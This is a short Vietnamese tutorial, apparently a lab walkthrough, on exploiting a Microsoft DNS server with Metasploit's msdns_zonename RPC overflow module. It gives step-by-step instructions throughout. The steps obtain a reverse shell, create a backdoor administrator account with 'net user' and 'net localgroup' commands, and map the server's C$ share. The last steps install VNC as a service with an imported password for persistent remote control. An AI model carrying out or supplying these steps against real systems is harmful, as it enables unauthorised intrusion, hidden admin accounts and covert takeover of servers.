Khai thác DNS server với Metasploit
Các bước khai thác DNS server với Metasploit
-Cài đặt và chạy chương trình Metasploit tại máy 10.100.100.100 để bắt đầu khai thác DNS Server tại địa chỉ 10.100.100.250
Double click lên dòng
msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)
-Chọn hệ điều hành
-Chọn kiểu lấy shell là window/shell_reverse_tcp
-Nhập địa chỉ ip của DNS server,trong trường hợp này là 10.100.100.250
-Xem lại thông tin => Apply để bắt đầu khai thác
-Nếu khai thác thành công ta sẽ lấy được shell của máy DNS server
-R-click => Interact Session để lấy shell
-Giao diện shell của DNS server sau khi bị khai thác
-Tao user ten admin sau đó add vao group administrators
net user admin p@ssw0rd /add
net localgroup administrators admin /add
-Trên máy 10.100.100.100 sử dụng lệnh :
net use H: \\10.100.100.250\C$ /user:admin p@ssw0rd để map ổ đĩa C$ trên DNS server về máy 10.100.100.100
-Copy thư mục VNC lên ổ đĩa H: mới map về ,với nội dung của file install.bat như sau
winvnc4 –register -đằng ký vnc chạy như 1 dịch vụ
winvnc4 –start -khởi chạy vnc
regedit /s vncpass.reg –import file vncpass.reg để cấu hình mật khẩu cho vnc
-Chạy file install.bat để trên shell có được trên DNS server
-Trên máy 10.100.100.100 chạy vncviewer để bắt đầu điều khiển
Tks